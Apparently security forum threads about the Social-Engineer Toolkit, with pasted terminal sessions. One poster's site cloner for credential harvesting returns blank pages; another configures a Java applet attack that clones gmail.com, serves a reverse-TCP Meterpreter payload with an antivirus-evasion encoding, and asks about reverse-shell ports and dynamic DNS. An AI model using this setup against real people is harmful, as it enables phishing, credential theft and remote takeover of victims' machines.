[S.e.t Not Cloning Sites Anymore]

Try doing an update on SET, to see if that fixes the problem.

I actually tried that, even tried reloading an older release via VMWARE snapshot. Doesn't help.

[S.e.t Not Cloning Sites Anymore]

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this

set:webattack> IP address for the POST back in Harvester/Tabnabbing:***********

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://*****.com

[*] Cloning the website: https://*****.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]

Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port *****
[*] Information will be displayed to you as it arrives below:

localhost - - [29/Jun/2012 13:39:44] "GET / HTTP/1.1" 200 -

Problem is, the CLONED_SITE is BLANK. Locating the INDEX.HTML file in the WEB_CLONE folder, its BLANK.

I'm not sure why this is happening. It worked perfect until yesterday. I deleted the PROGRAM_JUNK data, also reloaded an old Snapshot of SET, and I still have this issue. It DOES connects to the internet to clone the specified Site, but the cloned_site is just EMPTY/BLANK.

I did try plenty of other sites to clone. They all take a while in cloning from the Internet, and smoothly proceeds with listening to incoming connections, but the Index is empty. Could it be a bug in the Update?

[[query] Java Applet Set- Over The Internet]

If your external IP address is dynamic, than I'd use No-IP "hostname", if it's static I'd just use the IP.

Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

It won't be possible to run both applications on the same ports, what you could do is have both apps running at the same time but on different ports.

Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again?

Thanks again.

[[query] Java Applet Set- Over The Internet]

Hi, before i pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF.

Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:

   1) Java Applet Attack Method

set:webattack>1

   2) Site Cloner

set:webattack>2

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]: y  

#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######

#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://gmail.com

[*] Cloning the website: https://gmail.com
 [*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                       Description:
   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2

Below is a list of encodings to try and bypass AV. 
Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
  16) Backdoored Executable (BEST)

set:encoding>16
#####set:payloads> PORT of the listener [443]:#####

[*] Generating x64-based powershell injection code...

FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you.

THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports?

Thankyou